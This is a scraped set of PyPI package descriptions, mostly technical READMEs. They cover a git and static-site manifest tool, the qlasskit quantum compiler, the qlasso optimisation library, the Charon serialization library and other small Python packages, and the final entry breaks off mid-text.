rueTrue11arbspin-arbmasterwwwgit@gitlab.com:spin-arb/spin-arb.gitlab.io.gitwwwTrueTrue12reedqu-reedmasterwwwgit@gitlab.com:qu-reed/qu-reed.gitlab.io.gitwwwTrueTrue13notoqu-notomasterwwwgit@gitlab.com:qu-noto/qu-noto.gitlab.io.gitwwwTrueTrue14plotqu-plotmasterwwwgit@gitlab.com:qu-plot/qu-plot.gitlab.io.gitwwwTrueTrue15docspin-docmasterwwwgit@gitlab.com:spin-doc/spin-doc.gitlab.io.gitwwwTrueTrue16labsqu-labsmasterwwwgit@gitlab.com:qu-labs/qu-labs.gitlab.io.gitwwwTrueTrueIn this example, thepollrepo is on the master branch, and the rest are on the www (web deploy) branch.Obviously this can then be used to clone the repositories locally\n(or address them for any othergit-related task)One nice feature of GitLab (which at the time of writing GitHub doesn't\nprovide to my knowledge) is that these repos can all be private, and only\nthe static site will be hosted publicly (specified in 'Settings' > 'General')To clone a given repo (testing has all been with SSH URLs), there is theql.clone()function,\nand subsequently the namespace can berefreshed to reflect the new addition (this is\ndone automatically within theclonefunction).>>>ql.ns{}>>>ql.clone(ql.ssm.repos_df.git_url[0],\"spin.systems\")Cloninginto'spin.systems'...remote:Enumeratingobjects:6,done.remote:Countingobjects:100%(6/6),done.remote:Compressingobjects:100%(6/6),done.remote:Total236(delta1),reused0(delta0),pack-reused230Receivingobjects:100%(236/236),34.16KiB|210.00KiB/s,done.Resolvingdeltas:100%(123/123),done.>>>ql.ns{'spin.systems':'https://gitlab.com/spin-systems/spin-systems.gitlab.io'}Lastly, the entire manifest of repos can be sourced fromssmandcloned into thens_pathdirectory. This is done on CI to build each site when a change takes place\nin one of the source repos or the quill repo (the 'engine').ql.source_manifest()For now, if the directory named as thedomainentry of the row in thessm.repos_dftable exists, it will simply not touch it. If it doesn't exist, it will try to clone it.Et voila the namespace now contains all the repos (stored in the siblingssdirectory)>>>pprint(ql.ns){'arb':'https://gitlab.com/spin-arb/spin-arb.gitlab.io','arc':'https://gitlab.com/appendens/appendens.gitlab.io','cal':'https://gitlab.com/qu-cal/qu-cal.gitlab.io','conf':'https://gitlab.com/qu-conf/qu-conf.gitlab.io','doc':'https://gitlab.com/spin-doc/spin-doc.gitlab.io','erg':'https://gitlab.com/spin-erg/spin-erg.gitlab.io','labs':'https://gitlab.com/qu-labs/qu-labs.gitlab.io','log':'https://gitlab.com/spin-log/spin-log.gitlab.io','noto':'https://gitlab.com/qu-noto/qu-noto.gitlab.io','ocu':'https://gitlab.com/naiveoculus/naiveoculus.gitlab.io','opt':'https://gitlab.com/spin-opt/spin-opt.gitlab.io','plot':'https://gitlab.com/qu-plot/qu-plot.gitlab.io','poll':'https://gitlab.com/qu-poll/qu-poll.gitlab.io','pore':'https://gitlab.com/qu-pore/qu-pore.gitlab.io','qrx':'https://gitlab.com/qu-arx/qu-arx.gitlab.io','reed':'https://gitlab.com/qu-reed/qu-reed.gitlab.io','spin.systems':'https://gitlab.com/spin-systems/spin-systems.gitlab.io'}At the end ofsource_manifest, thessm.repos_dfDataFrame is updated with a columnlocalindicating whether each domain in the manifest is now in thensnamespace (i.e. whether a\nlocal repo has been created), via thecheck_manifestmethod whichssm'sMMDclass inherits\nfrom theDocclass.Thisupdate_manifestmethod will be expanded to supplement therepos_dfDataFrame with\nother information worth knowing to do with thegitstatus of the repo in question, for those\nwhich are locally available. This ensures no unnecessary computation is done before the extra\ninformation is needed.The next thing we can do (having established that these are now cloned locally) is to read the CI YAML\nas the 'layout' for each site, checking they're valid (according to thereferenceon YAML configs for GitLab Pages)>>>manifests=ql.yaml_manifests(as_dicts=False)>>>fork,minmanifests.items():print(k,end=\"\\t\");pprint(m)spin.systemsSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}calSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}logSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}confSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}poreSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}ocuSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}arcSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}qrxSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}ergSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}optSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}pollSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}arbSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}reedSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}notoSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}plotSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}docSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}labsSiteCI:PagesJob:{Stage.Deploy,Script,Artifacts,Only}Obviously these could all be made more elaborate for less trivial scripts, this is a first draft showing basic functionality and to enforce/check standardisation across all reposThis setup is deliberately brittle, so any changes will need to be validated in thefold.yaml_utilmodule,\nand so the library itself incorporates testing (simpleassertstatements based on a clear expected implementation)The build directory can be set withchange_build_dir, and using this I set all of the repos to\nbuild from \"site\" (but this can be changed at a later date):fordinql.alias_df.domain:ql.change_build_dir(d,\"site\")\u21e3Moved build path for log from 'site' --> /home/louis/spin/ss/log/site\nCreated build path for ocu at /home/louis/spin/ss/ocu/site\nMoved build path for arc from 'site' --> /home/louis/spin/ss/arc/site\nCreated build path for erg at /home/louis/spin/ss/erg/site\nCreated build path for opt at /home/louis/spin/ss/opt/site\nCreated build path for arb at /home/louis/spin/ss/arb/site\nCreated build path for doc at /home/louis/spin/ss/doc/site\nCreated build path for cal at /home/louis/spin/ss/cal/site\nMoved build path for conf from 'docs' --> /home/louis/spin/ss/conf/site\nCreated build path for pore at /home/louis/spin/ss/pore/site\nCreated build path for qrx at /home/louis/spin/ss/qrx/site\nCreated build path for poll at /home/louis/spin/ss/poll/site\nCreated build path for reed at /home/louis/spin/ss/reed/site\nCreated build path for noto at /home/louis/spin/ss/noto/site\nCreated build path for plot at /home/louis/spin/ss/plot/site\nCreated build path for labs at /home/louis/spin/ss/labs/siteTo commit these changes, I added some more functions to manage thegitrepos.ql.ssm.check_manifest()now has a column referring to whether the working tree\nis clean or has changes to tracked files not staged for commit.The output will be something like this example (where the README inarcwas moved):ql.remote_push_manifest()\u21e3Skipping 'repo_dir=/home/louis/spin/ss/spin.systems' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/cal' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/log' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/conf' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/pore' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/ocu' (working tree clean)\nCommit [repo_dir=/home/louis/spin/ss/arc] \u2836 Renamed site/README.md -> README.md\n\u21e2 Pushing \u2836 origin\nSkipping 'repo_dir=/home/louis/spin/ss/qrx' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/erg' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/opt' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/poll' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/arb' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/reed' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/noto' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/plot' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/doc' (working tree clean)\nSkipping 'repo_dir=/home/louis/spin/ss/labs' (working tree clean)This function takes arefspecargument which indicates a particular path to add and push in each repo,\naspecific_domainsargument which can be a string of a single domain, or list of multiple,\nand will be evaluated as the list of all domains if left asNone.Runningssm.check_manifest()again is required to updatessm.repos_df.Thisrepos_dfdataframe is also useful for comparing whatever\nother properties you might want to check, e.g. which have a README>>>df=ql.ssm.repos_df>>>df[\"has_README\"]=[\"README.md\"in[x.nameforxin(ql.ns_path/d).iterdir()]fordindf.domain]>>>dfdomainrepo_namebranches...localcleanhas_README0spin.systemsspin-systemsmasterwww...TrueTrueTrue1calqu-calmasterwww...TrueTrueFalse2logspin-logmasterwww...TrueTrueTrue3confqu-confmasterwww...TrueTrueTrue4porequ-poremasterwww...TrueTrueFalse5ocunaiveoculusmasterwww...TrueTrueTrue6arcappendensmasterwww...TrueTrueTrue7qrxqu-arxmasterwww...TrueTrueFalse8ergspin-ergmasterwww...TrueTrueFalse9optspin-optmasterwww...TrueTrueFalse10pollqu-pollmasterwww...TrueTrueFalse11arbspin-arbmasterwww...TrueTrueFalse12reedqu-reedmasterwww...TrueTrueFalse13notoqu-notomasterwww...TrueTrueFalse14plotqu-plotmasterwww...TrueTrueTrue15docspin-docmasterwww...TrueTrueFalse16labsqu-labsmasterwww...TrueTrueFalseObviously this is the kind of thing to then follow up manually,\nbut it helps to have programmatic ways to view the set of directories.If after reviewingssm.repos_dfyou want to push, you can do so\neither with an automated commit message or by passing it as thecommit_msgargument toremote_push_manifest(which will reuse the same commit message\nif multiple repos are not clean).Note you can always manually go in and check thegit diffbeforehandstatic,src, andwireTo build all sites with asrcand/orstaticdirectory, runql.fold.cut.standup().\nThis builds templates from thesrcfolder withstaticjinja, and the static files\nare just copied over (directly undersite/).To build all sites with a wire config, runql.fold.wire.standup().More detailsIn fact,standupreturns a dictionary of the domains, though for now\nonly one domain is in use with wires.emitters=ql.fold.wire.standup(verbose=False)emitters\u21e3{'poll': }Then to push the sites 'live', runql.remote_push_manifest(\"Commit message goes here\").AliasesThe \"canonical names\" displayed in the README are the aliases, which by and large\nare the same as the domain names.These provide the titles of the index pages of each site.I might make more use of these in future, I originally only needed these\nas it turns out the description on GitHub/GitLab isn't stored in the git repo\nitself (silly as there's adescriptionbuilt in togit?)Using this let me generate a nice README for the spin.systems superrepo:spin.systemsspin.systems:sscal:q \u2836 callog:\u222b \u2836 logconf:q \u2836 confpore:q \u2836 biorxocu:\u222b \u2836 ocuarc:\u222b \u2836 appqrx:q \u2836 arxerg:\u222b \u2836 ergopt:\u222b \u2836 optpoll:q \u2836 pollarb:\u222b \u2836 arbreed:q \u2836 reednoto:q \u2836 ruinotoplot:q \u2836 plotspotdoc:\u222b \u2836 doclabs:q \u2836 labsAddresses\"Spin addresses\" follow the above \"{namespace}\u2836{domain|alias}\" format, and additionally:Some (initially only\u222b\u2836log) subdomain repos are 'deploy' stage counterparts\nto local 'dev' stage directories.Some (initially only\u222b\u2836log) subdomain repos will be 'addressed' with a date\n[and a zero-based counter for same-day entries]>>>example=\"\u222b\u2836log\u283620\u2836oct\u283625\u28360\">>>eg_addr=ql.AddressPath(example)>>>eg_addr['\u222b','log','20','oct','25','0']The path has been parsed (\"strictly\" by default) into parts which are\n'typed' strings.pprint(list(map(type,eg_addr)))\u21e3[,\n ,\n ,\n ,\n ,\n ]A file path can be obtained from this usinginterpret_filepath,\nwhich is bound to the class as thefilepathproperty:>>>eg_addr.filepathPosixPath('/home/louis/spin/l/20/10oct/25/0_digitalising_spin_addresses.mmd')>>>eg_addr.filepath.exists()True>>>ql.mmd(eg_addr.filepath)ParsedMMDfile(Documentof4blocks)This comes in handy when building components of the spin.systems site such astapwhich can then build parts for a particular domain\nwith>>>eg_addr=ql.AddressPath.from_parts(domain=\"poll\",ymd=(2021,2,17))>>>eg_addr.filepathPosixPath('/home/louis/spin/ss/poll/transmission/21/02feb/17')This gives a simple date-based interface obeying the storage structure of quill,\nthough unlike files, paths to directories in this way may not exist\n(instead they can be created as needed).TODOA next step could be a class representing the state of the websites [beyond CI], which can\nthen be cross-referenced against therepos_df(but the goal is not to entirely Python-ise\nthe site development, just the management of key aspects to do with the version control on disk)Make a pip installable binary wheel (bdist not currently working with SCM, just sdist)Make package capable of downloading missing data files in the event it is being distributed"} +{"package": "qlab", "pacakge-description": "UNKNOWN"} +{"package": "qlang", "pacakge-description": "QNOTICE: This is work in progressA concise, procedural programming language.InstallationTo install Q from pip, use the command:$ pip install qlangIf you want to use Q from a shell script, navigate to the directory where Q is installed and create a symbolic link:ln -s ./cli.py qUsageTo use Q from a shell script:$ q # run interactive shell\n$ q # run fileTo use Q using the Python API:fromqimportrun,run_textrun_text('')# run textrun('')# run fileExample programFactorialF={$0>1?$0*F($0-1):1}"} +{"package": "qlapi", "pacakge-description": "No description available on PyPI."} +{"package": "qlapi-nrsdk", "pacakge-description": "No description available on PyPI."} +{"package": "qlasskit", "pacakge-description": "QlasskitQlasskit is a Python library that allows quantum developers to write classical algorithms in pure Python and translate them into unitary operators (gates) for use in quantum circuits, using boolean expressions as intermediate form.This tool will be useful for any algorithm that relies on a 'blackbox' function and for describing the classical components of a quantum algorithm.Qlasskit implements circuit / gate exporters for Qiskit, Cirq, Qasm, Sympy and Pennylane.Qlasskit also support exporting to Binary Quadratic Models (bqm, ising and qubo) ready to be used in\nquantum annealers, ising machines, simulators, etc.pipinstallqlasskitFor a quickstart, read thequickstartandexamplesnotebooks from the documentation:https://dakk.github.io/qlasskit.fromqlasskitimportqlassf,Qint4@qlassfdefh(k:Qint4)->bool:h=Trueforiinrange(4):h=handk[i]returnhQlasskit will take care of translating the function to boolean expressions, simplify them and\ntranslate to a quantum circuit.Then, we can use grover to find which h(k) returns True:fromqlasskit.algorithmsimportGroveralgo=Grover(h,True)qc=algo.circuit().export(\"circuit\",\"qiskit\")And that's the result:Qlasskit also offers type abstraction for encoding inputs and decoding results:counts_readable=algo.decode_counts(counts)plot_histogram(counts_readable)You can also use other functions inside a qlassf:@qlassfdefequal_8(n:Qint4)->bool:returnequal_8==8@qlassfa(defs=[equal_8])deff(n:Qint4)->bool:n=n+1ifequal_8(n)elsenreturnnQlasskit supports complex data types, like tuples and fixed size lists:@qlassfdeff(a:Tuple[Qint8,Qint8])->Tuple[bool,bool]:returna[0]==42,a[1]==0@qlassfdefsearch(alist:Qlist[Qint2,4],to_search:Qint2):forxinalist:ifx==to_search:returnTruereturnFalseQlasskit function can be parameterized, and the parameter can be bind before compilation:@qlassfdeftest(a:Parameter[bool],b:bool)->bool:returnaandbqf=test.bind(a=True)RoadmapReadTODOfor details about the roadmap and TODOs.ContributingReadCONTRIBUTINGfor details.LicenseThis software is licensed withApache License 2.0.Cite@software{qlasskit2023,\n author = {Davide Gessa},\n title = {qlasskit: a python-to-quantum circuit compiler},\n url = {https://github.com/dakk/qlasskit},\n year = {2023},\n}About the authorDavide Gessa (dakk)https://twitter.com/dagidehttps://mastodon.social/@dagidehttps://dakk.github.io/https://medium.com/@dakk"} +{"package": "qlasso", "pacakge-description": "qlassoThis package provides algorithms and screening rules to solve thequadratic lassoproblem\\underset{x}{\\min}\\ \\|Ax-c\\|^2 + \\lambda \\|x\\|_1^2or, more generally, thequadratic group-lasso\\underset{X}{\\min}\\ \\|AX-K\\|^2 + \\lambda \\left( \\sum_{i=1}^p \\|x_i\\|_2 \\right)^2,where $A\\in\\mathbb{R}^{n\\times p}$, $c\\in\\mathbb{R}^n$, $K\\in\\mathbb{R}^{n\\times r}$ and $x_i\\in\\mathbb{R}^r$ denotes the $i$th row of the matrix $X\\in\\mathbb{R}^{p \\times r}$. It implements the techniques\ndevelopped in a paper recently submitted by G.\u00a0Sagnol and L.\u00a0Pronzato,\"Fast Screening Rules for Optimal Design via Quadratic Lasso Reformulation\", which\nproposes new screening rules and a homotopy algorithm for solving Bayes optimal design problems.\nThis work is a follow-up of the articleSagnol & Pauwels (2019). Statistical Papers 60(2):215--234,\nwhere it was shown that the quadratic lasso is equivalent to the problem ofBayes $c$-optimal design:\\min_{w\\geq 0, \\sum_{i=1}^p w_i=1}\\quad c^T \\left( \\sum_{i=1}^p w_i a_i a_i^T + \\lambda I_n \\right)^{-1} cand the quadratic group-lasso is equivalent to the problem ofBayes $L$-optimal design:\\min_{w\\geq 0, \\sum_{i=1}^p w_i=1}\\quad \\operatorname{trace}\\ K^T \\left( \\sum_{i=1}^p w_i a_i a_i^T + \\lambda I_n \\right)^{-1} K,with $a_i\\in\\mathbb{R}^n$ the $i$th column of $A$.InstallationIf you are usingpip, you can simply runpip install qlassoUsageLoad the modulesqlasso_instanceandqlasso_solversimportqlasso.qlasso_instanceasqliimportqlasso.qlasso_solversasqls# load a small random instancerand_instance=qli.SLassoInstance.random_instance(p=50,n=8)# load the mnist instance considered in the papermnist_instance=qli.SLassoInstance.mnist_instance(sample_size=600,resize=1)#inspect size of `A` and `c`print('MNIST. Shape of A:',mnist_instance.A.shape,' -- Shape of c:',mnist_instance.c.shape)print('RAND. Shape of A:',rand_instance.A.shape,' -- Shape of c:',rand_instance.c.shape)Solve the MNIST instance with the CD solver, and D1-screening rule run every 10 iterationsAcceleration should become clearly visible after roughly 50 iterationssolver=qls.CDSolver(mnist_instance,maxit=1000,print_frequency=1,screening_rules=['D1'],screen_frequency=10,apply_screening=True,tol=1e-6)#solve the problem with the value lambda=0.1 for the regularization parametersolver.solve(lbda=0.1)#print optimal solution of the quadratic lassoprint('optimal x-solution:')solver.print_x()#print the corresponding c-optimal designprint()print('optimal design:')solver.print_w()Solve the small random instance with a specific solver and compare the effect of different screening rules:# you can replace ['MWU'] with the solver of your choicealgo={'fista':qls.FistaSolver,# FISTA'CD':qls.CDSolver,# (Block-)Coordinate Descent'FW':qls.FWSolver,# Frank-Wolfe'MWU':qls.MultiplicativeSolver,# Multiplicative Weight Update}['MWU']solver=algo(rand_instance,maxit=1000,print_frequency=1,screening_rules=['B1','B2','B3','D1','D2'],screen_frequency=5,apply_screening=False,#this is required to obtain the true rejection rate of each screening rule#turn this option to True to obtain a CPU speed-uptol=1e-6)solver.solve(lbda=0.1)NB: The ruleB4considered in the paper is also implemented, but it only works for $A$-optimal design problems (i.e., with $r=n$, $K=I$).Now, we can draw a plot to visualize the number of design points eliminated by each rule, as a function of the iteration count:# plot the rejection rate by different screening screening_rulesimportmatplotlib.pyplotaspltforruleinsolver.screening_rejection:plt.plot(solver.screen_iter,solver.screening_rejection[rule],label=rule)plt.legend()plt.show()Solve a quadratic lasso instance using an adaptation of the Homotopy algorithm (LARS)The orginal algorithm for the standard (with non-squared penalty) lasso was described inOsborne, Presnell & Turlach (2000). IMA Journal of Numerical Analysis, 20(3):389--403.andEfron, Hastie, Johnstone & Tibshirani (2004). The Annals of Statistics, 32(2):407--499.lars_solver=qls.LarsSolver(mnist_instance)lars_solver.solve(lbda=0.1)#print the c-optimal designprint()print('optimal design:')lars_solver.print_w()Solve a quadratic lasso instance with a SOCP solverYou can replace 'cvxopt' with the name of a commercial solver installed on your system, such asgurobiormoseksocp_solver=qls.PicosSolver(mnist_instance)socp_solver.solve(lbda=0.1,verbosity=1,solver='cvxopt',tol=1e-4)# solves a SOCP reformulation of the Quadratic Lasso problemLicenseqlassois free and open source software and available to you under the terms of the MIT LicenseCitingThe manuscript that describes the methods used in this package will be referenced here upon publication."} +{"package": "qlat", "pacakge-description": "QlatticeA simple lattice QCD library."} +{"package": "qlat-cps", "pacakge-description": "QlatticeA simple lattice QCD library."} +{"package": "qlat-grid", "pacakge-description": "QlatticeA simple lattice QCD library."} +{"package": "qlat-utils", "pacakge-description": "Qlat-UtilsQlattice utilities."} +{"package": "qlazy", "pacakge-description": "No description available on PyPI."} +{"package": "qlc", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "ql-charon", "pacakge-description": "======Charon======Charon makes data serialization and deserialization simple and secure.Charon was inspired by the `Camel project `_,but unlike Camel it does not force a particular serialization format. Charon offers a simple interfacefor defining functions that convert between complex Python objects and primitives that can beserialized into a format of your choice.In other words, this is not a tool that takes an object and serializes it to JSON.It is a tool that takes an object and using a *user-defined serialization function* it converts itto basic Python types which are then serializable to JSON, YAML, msgpack etc.This project also contains (de)serializers for some standard types like ``datetime.datetime``,`set`` and ``frozenset``.Registries can be tested (see `Writing tests`_). This heavily relies on the ``pytest`` module and allows the userto:* test implemented dumpers and loaders while keeping track of implemented versions (see `Version tests`_);* test if all dumpers and loaders have their tests (see `Metatests <#metatests-tests-testing-the-existence-of-loader-dumper-tests>`_);* write tests easily by simply parametrizing a predefined generalized test case (see `Generic tests`_).Usage=====Define dumpers and loaders using decorators with a ``charon.CodecRegistry`` instanceand then group multiple codec registries together using ``charon.Codec``.You can serialize and deserialize objects for which dumpers and loaders were defined by callingthe ``dump`` and ``load`` methods of ``Codec``.Whenever a codec serializes an object, it checks what the serialization function returned and if it finds an objectthat is not a basic Python type, it tries to serialize it again. This kind of recurrent behavior can be time-consuming(and even dangerous for circular references)... note::If there are multiple registries able to serialize the same objectwith same version, the first one found from the *end* of the registries list is picked and used.----------------Creating dumpers----------------Creating a dumper is simple. First you have to create a registry in which this dumper will be stored.This is done by:::import charonregistry = charon.CodecRegistry()Then you just have to decorate a function which will receive an instance to serialize.The class of the instance to serialize is given to the decorator as the first argument.The second argument is the *version* which allows versioning of your class and its serialized structure.This approach allows you to restore serialized objects that were created using an older structure(field names may change, variables may come and go etc.).The last parameter ``class_hash`` is optional and is used for version testing (see `Version tests`_).The function that you decorate should accept one argument - the object instance to be serialized.We serialize it into a dictionary containing base values from which we can restore this object... _timedelta_dumper:::@registry.dumper(datetime.timedelta, version = 1, class_hash = 'dadf350239d3779d72d9c933ab52db1b')def _dump_timedelta(obj):return {'days': obj.days, 'seconds': obj.seconds, 'microseconds': obj.microseconds}----------------Creating loaders----------------Creating a loader is also simple. Again you have to have a registry which will store this loader (we use the one definedin the previous section), and again you have to decorate a function which will receive data,but this time these data are those we created using the dumper function.The loader decorator is similar to the dumper one. The first argument is the class which we should deserialize(which we will instantiate from the data received). The second argument, version, is used as mentioned above forversioning of the class implementation. It allows developers to change the structure of their classes and still be ableto restore previously serialized objects into this newer structure.The function which you decorate should accept one parameter: the data previously returned by the serializationfunction (see `_dump_timedelta`).From the received dictionary we recreate an object using its constructor (if applicable) orsetting its internal variables directly (yes, this may be appropriate when deserializing data).::@registry.loader(datetime.timedelta, version = 1, class_hash = 'dadf350239d3779d72d9c933ab52db1b')def _load_timedelta(data):return datetime.timedelta(days = data['days'], seconds = data['seconds'], microseconds = data['microseconds'])-------------------------Using loaders and dumpers-------------------------After we have defined all our classes which will be serialized we can use ``charon.Codec`` to serializeand deserialize objects... code:: python>>> import datetime>>> import charon, charon.extensions>>> codec = charon.Codec([charon.extensions.STANDARD_REGISTRY])>>> delta = datetime.timedelta(seconds = 42)>>> encoded = codec.dump(delta)>>> print(encoded){'!meta': {'dtype': 'timedelta', 'version': 2}, 'params': [0, 42, 0]}>>> loaded = codec.load(encoded)>>> print(delta)0:00:42>>> print(loaded)0:00:42>>> print(delta == loaded)TrueWriting tests=============.. note:: These tests use ``pytest`` module.This section describes options that Charon offers for testing loaders and dumpers.These tests are meant to help with keeping all loaders and dumpers tested andup to date with class structure.There is also a test function that should represent basic test structure for testinga serialization/deserialization pipeline... _pytest.mark.parametrize: https://docs.pytest.org/en/latest/parametrize.html.. _pytest_generate_tests: https://docs.pytest.org/en/latest/parametrize.html#pytest-generate-tests.. _generic_tests:-------------Generic tests-------------Charon contains a generic test definition ``test_serialization_pipeline``.This test is a generalized test case consisting of object serialization, deserialization and comparison.The original object and the deserialized object are both tested if they match the class for which the test is used.This is a sanity check to prevent serializating instances of one class and getting instances of another classafter deserialization.The original and the deserialized objects are then compared against each other using the ``vars`` functionif possible, otherwise the standard equality operator (``__eq__``) is used.Usage-----First you have to import the appropriate test function. This is best done in ``conftest.py`` because we will use it later.You also have to define a ``serializer`` fixture to use with this test.::import pytestimport charonfrom charon.testing.generic import test_serialization_pipeline@pytest.fixturedef serializer():return charon.Codec([registry])Then you have to define parameters.You can rename the test function to some convenient name and then use a wrapper to call it.But it is better to parametrize it directly using the pytest marker `pytest.mark.parametrize`_:::pytest.mark.parametrize([(ExampleClass, ExampleClass('Ahoy'))])(test_serialization_pipeline)Another way to parametrize it is by using the `pytest_generate_tests`_ function of pytest.::def pytest_generate_tests(metafunc):'''Generates test cases for simple deserialization and serialization.Test cases are generated by functions with ```generate_``` prefix'''if metafunc.function.__name__ == 'test_serialization_pipeline':metafunc.parametrize('cls, original_obj', [(ExampleClass, ExampleClass('Ahoy'))]).. _Metatests:--------------------------------------------------------------Metatests - Tests testing the existence of loader/dumper tests--------------------------------------------------------------Charon contains tests for testing whenever all dumpers and loaders have tests. This aproach is called metatesting.These tests are convenient when you want to make sure that all of your dumpers and loaders have tests.Usage-----To use this metatest you have to mark your dumper and loader tests with ``pytest.mark``... code:: python@pytest.mark.charon(cls = ExampleClass, dumper_test = True, loader_test = False)def test_example_dumper(self):passAs you can see you use keywords to set up the mark. The ``cls`` keyword specifies the class for which this test works,``dumper_test`` specifies if this is a dumper test and obviously ``loader_test`` specifies whenever this is a loader test.This way you mark all of your tests. Then you just have to import metatests from the ``charon.testing.metatest`` package... code:: pythonfrom charon.testing.metatest import (test_charon_dumper_tests,test_charon_loader_tests,scope_charon_tests)pytest.fixture(scope = 'module')(scope_charon_tests)And that's all: from this point forth all loader and dumper methods would have to be properly tested... note:: This only tests the existence of tests. It does not test the version for which those teste were written. To test the version for which the tests were written see `Version tests`_... note::pytest.fixture(scope = 'module')(scope_charon_tests)We create this fixture in the module scope and in the session scope because that could create false positive cases.Example:You have have two registries in different codecs which serialize and deserialize the same class differently.One of these codecs have tests for this class and the others don't. If you use a session fixture in this caseyou will get a false positive check, because the fixture will return tests which are defined for one of the codecsbut not for the other. Metatests do not check to which codec (implementation) is a test bound... _version_tests:-------------Version tests-------------In large projects it is sometimes difficult to keep track of changes in classes, and to keep their serialization up to date.For example, in a project with multiple people colaborating on it changes in one class can be made separatwly by multipledevelopers, and one of them may forget to update the particular dumpers and loaders and increment their version.To prevent this, Charon has an option to create a hash of class implementation (hash of the AST) and annotatea dumper / loader with it. Charon also includes tests from ``charon.testing.ast_hash`` called``test_dumpers_version``and ``test_loaders_version``.Usage-----To use this feature first we have to create a hash of the current implementation.This can be done using ``charon_ast_hash`` script provided by this package.See: ``Generating a hash``When we havea hash of the class implementation we add a keyword to the standard decorator for loader / dumper... code:: python@registry.dumper(Object, version = 1, class_hash = 'd2498176fad81ad017d1b0875eeeeb1b')def _load_object_v1(_):passThis way we pass the hash of the class implementation to the registry... note::The hash is kept only for the latest version of a dumper / loader becausewe cannot check these versions with older implementations of a particular class.These are all the changes in dumper and loader implementations. Next you have to import the test methods`charon.testing.ast_hash.test_dumpers_version`` and ``charon.testing.ast_hash.test_loaders_version``into your test file and pass it an instance of ``charon.Codec``, containing the registries you want to test... code:: pythonfrom charon.testing.ast_hash import test_dumpers_version, test_loaders_version@pytest.fixturedef serializer():return charon.Codec([my_registry])From this point on, whenever you run pytest, all your loaders and dumpers which have ``class_hash`` defined will bechecked against the hash of the current class implementation... _generating-class-hash:---------------------------------------------Generating a hash of a class implementation---------------------------------------------To generate the hash of the AST (Abstract Syntax Tree) of a class you can use script provided with Charoncalled ``charon_ast_hash``. This script takes a list of classes to be hashed as an argument list... note::This command internally uses the ``inspect`` module to get the source code which is then parsed by the ``ast`` module.Methods and classes from ``__builtins__`` and from compiled libraries cannot be hashed.Example usage--------------.. code:: bash$ charon_ast_hash datetime.datetime datetime.timedatetime.datetime: 4927808ca19f2a1494719baa11024a7ddatetime.time: c36b819f18698ee9143ecd92e3788c66Standard Registry=================The Charon package comes with an implementation for some Python types that are built in or in the standard library:* ``decimal.Decimal``* ``set``* ``frozenset``* ``datetime.datetime``* ``datetime.date``* ``datetime.time``* ``datetime.timedelta``This registry can be used by simply creating your ``charon.codec`` with an additional registry``charon.extensions.STANDARD_REGISTRY``.-------------Example usage-------------Basic usage is pretty simple. You just have to create a ``charon.codec`` object with an additional codec registry``charon.extensions.STANDARD_REGISTRY``,preferably at the begining of the list (in case you would want to override standard implementations of dumpers / loaders)... code:: python>>> import charon, charon.extensions>>> import decimal>>> codec = charon.Codec([charon.extensions.STANDARD_REGISTRY])>>> number = decimal.Decimal('4.5')>>> print(number)4.5>>> serialized = codec.dump(number)>>> print(serialized){'!meta': {'dtype': 'Decimal', 'version': 1}, 'params': '4.5'}>>> loaded = codec.load(serialized)>>> print(loaded)4.5"} +{"package": "qlcompiler", "pacakge-description": "The quick lambda compiler takes quick lambda objects from sidekick and compiles\nthem either to Python, C or Javascript code. The goal is to improve\ninteroperability between Python and other languages that can be useful in some\ncommon Python applications.C compilerThe main goal of the C compiler is to help with scientific Python where simple\nand small functions can be defined both in Python and C. The goal is to\nprototype a function in a scientific computation in Python and then later\nconvert it to C and have huge speed gains with very little effort.The main use case is interoperability with Numpy, but it can be used as a simple\ncode generator for other C applications.>>> from sidekick import _\n>>> from qlcompiler import c_compiler\n>>> print(c_compiler.compile(_ + 2))\nvoid function(double _) {\n return _ + 2;\n}Javascript compilerSimilarly to C compiler, the Javascript compiler converts quick lambdas to\nJavascript code. It may be useful in web application in order to share code\nbetween the client and the server.>>> from qlcompiler import js_compiler\n>>> print(js_compiler.compile(_ + 2))\nfunction(_) {\n return _ + 2;\n}"} +{"package": "qlcpy", "pacakge-description": "QLCpyGenerates questions about concrete constructs and patterns in a given Python\nprogram. These questions (including answering options) can be posed to a\nlearner to practice introductory programming. These questions include elements\nto develop program comprehension and program tracing.Automatic generation enables systems to pose the generated questions to leaners\nabout their own programs that they previously programmed. Such Questions About\nLearners' Code (QLCs) may have self-reflection and self-explanation effects\nthat are of interest in computing education research.ReferencesThe concept of Questions About Learners' Code (QLCs) is first introduced by Lehtinen et al. inLet's Ask Students About Their Programs, Automatically.Example resultFor the 